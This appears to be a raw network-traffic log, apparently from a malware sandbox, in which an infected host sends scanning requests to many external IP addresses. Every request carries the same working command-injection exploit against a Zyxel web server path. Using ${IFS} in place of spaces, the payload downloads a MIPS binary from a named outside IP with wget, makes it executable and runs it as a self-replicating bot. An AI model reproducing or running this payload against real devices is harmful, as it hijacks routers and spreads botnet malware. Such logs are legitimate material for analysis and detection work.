                                                Jan 29, 2024 07:08:00.595356941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7590192.168.2.2340822188.40.184.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595382929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7591192.168.2.2333712191.26.116.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595436096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7592192.168.2.2343720152.98.202.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595474005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7593192.168.2.2333140160.72.9.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595519066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7594192.168.2.234584884.72.216.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595537901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7595192.168.2.2347656220.129.48.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595572948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7596192.168.2.235991619.50.196.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595604897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7597192.168.2.235220254.28.152.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595668077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7598192.168.2.2352000125.130.93.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595695019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7599192.168.2.2346550158.208.69.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607340097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7600192.168.2.234317431.127.46.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607378960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7601192.168.2.23367545.15.3.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607428074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7602192.168.2.2345596195.119.30.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607487917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7603192.168.2.2360338157.148.107.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607522011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7604192.168.2.2342644203.65.178.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607558966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7605192.168.2.233314671.138.251.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607598066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7606192.168.2.2359540166.184.173.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607623100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7607192.168.2.2333960138.143.224.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607662916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7608192.168.2.23368505.67.171.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607711077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7609192.168.2.2355630143.102.67.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607757092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7610192.168.2.234387275.43.30.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607784033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7611192.168.2.2337584222.180.59.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607808113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7612192.168.2.234519631.18.140.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.607856035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7613192.168.2.2341114136.104.129.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608011007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7614192.168.2.2341432102.219.205.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608056068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7615192.168.2.2347700145.255.110.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608084917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7616192.168.2.234972818.184.150.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608144999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7617192.168.2.2351818126.151.2.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608184099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7618192.168.2.235743471.46.146.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608210087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7619192.168.2.2344146191.247.189.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608269930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7620192.168.2.233774847.166.242.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608299017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7621192.168.2.2349124217.90.11.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608349085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7622192.168.2.235525825.182.94.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608397007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7623192.168.2.235512620.113.232.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608444929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7624192.168.2.2344992145.167.64.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608503103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7625192.168.2.234659464.235.112.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608526945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7626192.168.2.233773038.163.199.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608558893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7627192.168.2.2349182157.247.83.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608612061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7628192.168.2.2348812102.213.20.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608650923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7629192.168.2.2354088129.84.250.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608699083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7630192.168.2.2337264135.251.1.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608740091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7631192.168.2.2345370221.190.48.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608802080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7632192.168.2.233436498.239.40.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608841896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7633192.168.2.2342190155.38.120.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608867884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7634192.168.2.2351140135.239.171.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608917952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7635192.168.2.235252654.139.152.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.608973026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7636192.168.2.235398671.255.139.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609028101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7637192.168.2.2339472195.50.140.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609045029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7638192.168.2.233980037.51.228.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609088898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7639192.168.2.2340998187.31.156.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609150887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7640192.168.2.234921235.55.135.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609185934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7641192.168.2.233655687.121.240.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609230995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7642192.168.2.236072418.176.76.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609257936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7643192.168.2.235963662.100.122.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609306097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7644192.168.2.2351562152.102.109.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609345913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7645192.168.2.235648479.91.50.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609380007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7646192.168.2.2342372186.154.139.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609409094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7647192.168.2.235020034.118.190.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609441996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7648192.168.2.2344834211.148.195.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609499931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7649192.168.2.235474673.120.61.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609559059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7650192.168.2.2352226205.225.39.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609595060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7651192.168.2.235701224.162.205.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609632969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7652192.168.2.233985042.72.49.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609692097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7653192.168.2.235714096.32.20.102443
                                                TimestampBytes transferredDirectionData
